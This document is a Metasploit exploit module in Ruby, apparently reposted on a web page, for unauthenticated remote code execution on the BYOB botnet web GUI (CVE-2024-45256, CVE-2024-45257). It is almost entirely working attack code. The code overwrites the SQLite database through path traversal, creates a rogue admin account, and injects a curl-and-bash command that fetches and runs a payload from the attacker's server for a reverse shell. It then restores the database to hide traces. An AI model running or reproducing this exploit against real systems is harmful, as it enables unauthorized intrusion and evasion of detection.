BYOB Unauthenticated Remote Code Execution

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require ‘sqlite3’

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘BYOB Unauthenticated RCE via Arbitrary File Write and Command Injection (CVE-2024-45256, CVE-2024-45257)’,
‘Description’ => %q{
This module exploits two vulnerabilities in the BYOB (Build Your Own Botnet) web GUI:
1. CVE-2024-45256: Unauthenticated arbitrary file write that allows modification of the SQLite database, adding a new admin user.
2. CVE-2024-45257: Authenticated command injection in the payload generation page.

These vulnerabilities remain unpatched.
},
‘Author’ => [
‘chebuya’, # Discoverer and PoC
‘Valentin Lobstein’ # Metasploit module
],
‘License’ => MSF_LICENSE,
‘References’ => [
[‘CVE’, ‘2024-45256’],
[‘CVE’, ‘2024-45257’],
[‘URL’, ‘https://blog.chebuya.com/posts/unauthenticated-remote-command-execution-on-byob/’]],
‘Platform’ => %w[unix linux],
‘Arch’ => %w[ARCH_CMD],
‘Targets’ => [
[
‘Unix/Linux Command Shell’, {
‘Platform’ => %w[unix linux],
‘Arch’ => ARCH_CMD,
‘Privileged’ => true
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
]],
‘DisclosureDate’ => ‘2024-08-15’,
‘DefaultTarget’ => 0,
‘DefaultOptions’ => { ‘SRVPORT’ => 5000 },
‘Notes’ => {
‘Stability’ => [CRASH_SAFE],
‘SideEffects’ => [IOC_IN_LOGS],
‘Reliability’ => [REPEATABLE_SESSION]}
)
)

register_options(
[
OptString.new(‘USERNAME’, [false, ‘Username for new admin’, ‘admin’]),
OptString.new(‘PASSWORD’, [false, ‘Password for new admin’, nil])
])
end

def primer
add_resource(‘Path’ => ‘/’, ‘Proc’ => proc { |cli, req| on_request_uri_payload(cli, req) })
print_status(‘Payload is ready at /’)
end

def on_request_uri_payload(cli, request)
handle_request(cli, request, payload.encoded)
end

def handle_request(cli, request, response_payload)
print_status(“Received request at: #{request.uri} – Client Address: #{cli.peerhost}”)

case request.uri
when ‘/’
print_status(“Sending response to #{cli.peerhost} for /”)
send_response(cli, response_payload)
else
print_error(“Request for unknown resource: #{request.uri}”)
send_not_found(cli)
end
end

def check
res = send_request_cgi({
‘method’ => ‘GET’,
‘uri’ => normalize_uri(target_uri.path),
‘keep_cookies’ => true
})

if res
doc = res.get_html_document

unless doc.at(‘title’)&.text&.include?(‘Build Your Own Botnet’) || doc.at(‘meta[name=”description”]’)&.attr(‘content’)&.include?(‘Build Your Own Botnet’)
return CheckCode::Safe(‘The target does not appear to be BYOB.’)
end
else
return CheckCode::Unknown(‘The target did not respond to the initial check.’)
end

print_good(‘The target appears to be BYOB.’)

random_data = Rex::Text.rand_text_alphanumeric(32)
random_filename = Rex::Text.rand_text_alphanumeric(16)
random_owner = Rex::Text.rand_text_alphanumeric(8)
random_module = Rex::Text.rand_text_alphanumeric(6)
random_session = Rex::Text.rand_text_alphanumeric(6)

form_data = {
‘data’ => random_data,
‘filename’ => random_filename,
‘type’ => ‘txt’,
‘owner’ => random_owner,
‘module’ => random_module,
‘session’ => random_session
}

res = send_request_cgi({
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, ‘api’, ‘file’, ‘add’),
‘ctype’ => ‘application/x-www-form-urlencoded’,
‘vars_post’ => form_data,
‘keep_cookies’ => true
})

if res&.code == 500
return CheckCode::Vulnerable
else
case res&.code
when 200
return CheckCode::Safe
when nil
return CheckCode::Unknown(‘The target did not respond.’)
else
return CheckCode::Unknown(“The target responded with HTTP status #{res.code}”)
end
end
end

def get_csrf(path)
res = send_request_cgi({
‘method’ => ‘GET’,
‘uri’ => normalize_uri(target_uri.path, path),
‘keep_cookies’ => true
})

fail_with(Failure::UnexpectedReply, ‘Could not retrieve CSRF token’) unless res

csrf_token = res.get_html_document.at_xpath(“//input[@name=’csrf_token’]/@value”)&.text
fail_with(Failure::UnexpectedReply, ‘CSRF token not found’) if csrf_token.nil?

csrf_token
end

def register_user(username, password)
csrf_token = get_csrf(‘register’)

res = send_request_cgi({
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, ‘register’),
‘ctype’ => ‘application/x-www-form-urlencoded’,
‘vars_post’ => {
‘csrf_token’ => csrf_token,
‘username’ => username,
‘password’ => password,
‘confirm_password’ => password,
‘submit’ => ‘Sign Up’
},
‘keep_cookies’ => true
})

if res.nil?
fail_with(Failure::UnexpectedReply, ‘No response from the server.’)
elsif res.code == 302
print_good(‘Registered user!’)
else
fail_with(Failure::UnexpectedReply, “User registration failed: #{res.code}”)
end
end

def login_user(username, password)
csrf_token = get_csrf(‘login’)

res = send_request_cgi({
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, ‘login’),
‘ctype’ => ‘application/x-www-form-urlencoded’,
‘vars_post’ => {
‘csrf_token’ => csrf_token,
‘username’ => username,
‘password’ => password,
‘submit’ => ‘Log In’
},
‘keep_cookies’ => true
})

if res.nil?
fail_with(Failure::UnexpectedReply, ‘No response from the server.’)
elsif res.code == 302
print_good(‘Logged in successfully!’)
else
fail_with(Failure::UnexpectedReply, “Login failed: #{res.code}”)
end
end

def generate_malicious_db
mem_db = SQLite3::Database.new(‘:memory:’)

mem_db.execute <<-SQL
CREATE TABLE user (
id INTEGER NOT NULL,
username VARCHAR(32) NOT NULL,
password VARCHAR(60) NOT NULL,
joined DATETIME NOT NULL,
bots INTEGER,
PRIMARY KEY (id),
UNIQUE (username)
);
SQL

mem_db.execute <<-SQL
CREATE TABLE session (
id INTEGER NOT NULL,
uid VARCHAR(32) NOT NULL,
online BOOLEAN NOT NULL,
joined DATETIME NOT NULL,
last_online DATETIME NOT NULL,
public_ip VARCHAR(42),
local_ip VARCHAR(42),
mac_address VARCHAR(17),
username VARCHAR(32),
administrator BOOLEAN,
platform VARCHAR(5),
device VARCHAR(32),
architecture VARCHAR(2),
latitude FLOAT,
longitude FLOAT,
new BOOLEAN NOT NULL,
owner VARCHAR(120) NOT NULL,
PRIMARY KEY (uid),
UNIQUE (uid),
FOREIGN KEY(owner) REFERENCES user (username)
);
SQL

mem_db.execute <<-SQL
CREATE TABLE payload (
id INTEGER NOT NULL,
filename VARCHAR(34) NOT NULL,
operating_system VARCHAR(3),
architecture VARCHAR(14),
created DATETIME NOT NULL,
owner VARCHAR(120) NOT NULL,
PRIMARY KEY (id),
UNIQUE (filename),
FOREIGN KEY(owner) REFERENCES user (username)
);
SQL

mem_db.execute <<-SQL
CREATE TABLE exfiltrated_file (
id INTEGER NOT NULL,
filename VARCHAR(4096) NOT NULL,
session VARCHAR(15) NOT NULL,
module VARCHAR(15) NOT NULL,
created DATETIME NOT NULL,
owner VARCHAR(120) NOT NULL,
PRIMARY KEY (id),
UNIQUE (filename),
FOREIGN KEY(owner) REFERENCES user (username)
);
SQL

mem_db.execute <<-SQL
CREATE TABLE task (
id INTEGER NOT NULL,
uid VARCHAR(32) NOT NULL,
task TEXT,
result TEXT,
issued DATETIME NOT NULL,
completed DATETIME,
session VARCHAR(32) NOT NULL,
PRIMARY KEY (id),
UNIQUE (uid),
FOREIGN KEY(session) REFERENCES session (uid)
);
SQL

base64_data = Tempfile.open(‘database.db’) do |file|
src_db = SQLite3::Database.new(file.path)
backup = SQLite3::Backup.new(src_db, ‘main’, mem_db, ‘main’)
backup.step(-1)
backup.finish

binary_data = File.binread(file.path)

Rex::Text.encode_base64(binary_data)
end

base64_data
end

def upload_database_multiple_paths
successful_paths = []filepaths = [
‘/proc/self/cwd/buildyourownbotnet/database.db’,
‘/proc/self/cwd/../buildyourownbotnet/database.db’,
‘/proc/self/cwd/../../../../buildyourownbotnet/database.db’,
‘/proc/self/cwd/instance/database.db’,
‘/proc/self/cwd/../../../../instance/database.db’,
‘/proc/self/cwd/../instance/database.db’
]

filepaths.each do |filepath|
form_data = {
‘data’ => @encoded_db,
‘filename’ => filepath,
‘type’ => ‘txt’,
‘owner’ => Faker::Internet.username,
‘module’ => Faker::App.name.downcase,
‘session’ => Faker::Alphanumeric.alphanumeric(number: 8)
}

res = send_request_cgi(
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, ‘api’, ‘file’, ‘add’),
‘ctype’ => ‘application/x-www-form-urlencoded’,
‘vars_post’ => form_data,
‘keep_cookies’ => true
)

successful_paths << filepath if res&.code == 200
end

successful_paths
end

def on_new_session(session)
if session.type == ‘meterpreter’
binary_content = Rex::Text.decode_base64(@encoded_db)

print_status(‘Restoring the database via Meterpreter to avoid leaving traces.’)

successful_restore = false

@successful_paths.each do |remote_path|
remote_file = session.fs.file.new(remote_path, ‘wb’)
remote_file.syswrite(binary_content)
remote_file.close
successful_restore = true
end

if successful_restore
print_good(‘Database has been successfully restored to its clean state.’)
else
print_error(‘Failed to restore the database on all attempted paths, but proceeding with the exploitation.’)
end
else
print_error(‘This is not a Meterpreter session. Cannot proceed with database reset, but exploitation continues.’)
end
end

def exploit
# Start necessary services and perform initial setup
start_service
primer

# Define or generate admin credentials
username = datastore[‘USERNAME’] || ‘admin’
password = datastore[‘PASSWORD’] || Rex::Text.rand_text_alphanumeric(12)

# Generate and upload the malicious SQLite database
print_status(‘Generating malicious SQLite database.’)
@encoded_db = generate_malicious_db

@successful_paths = upload_database_multiple_paths

if @successful_paths.empty?
fail_with(Failure::UnexpectedReply, ‘Failed to upload the database from all known paths’)
else
print_good(“Malicious database uploaded successfully to the following paths: #{@successful_paths.join(‘, ‘)}”)
end

# Register the new admin user
print_status(“Registering a new admin user: #{username}:#{password}”)
register_user(username, password)

# Log in with the newly created admin user
print_status(‘Logging in with the new admin user.’)
login_user(username, password)

# Prepare the malicious payload and inject it via command injection
print_status(‘Injecting payload via command injection.’)

uri = get_uri.gsub(%r{^https?://}, ”).chomp(‘/’)
random_filename = “.#{Rex::Text.rand_text_alphanumeric(rand(3..5))}”
malicious_filename = “curl$IFS-k$IFS@#{uri}$IFS-o$IFS#{random_filename}&&bash$IFS#{random_filename}”
payload_data = {
‘format’ => ‘exe’,
‘operating_system’ => “nix$(#{malicious_filename})”,
‘architecture’ => ‘amd64’
}

# Send the command injection request
send_request_cgi({
‘method’ => ‘POST’,
‘uri’ => normalize_uri(target_uri.path, ‘api’, ‘payload’, ‘generate’),
‘ctype’ => ‘application/x-www-form-urlencoded’,
‘vars_post’ => payload_data,
‘keep_cookies’ => true
}, 5)

# Keep the web server running to maintain the service
service.wait
end
end

نوشته های مشابه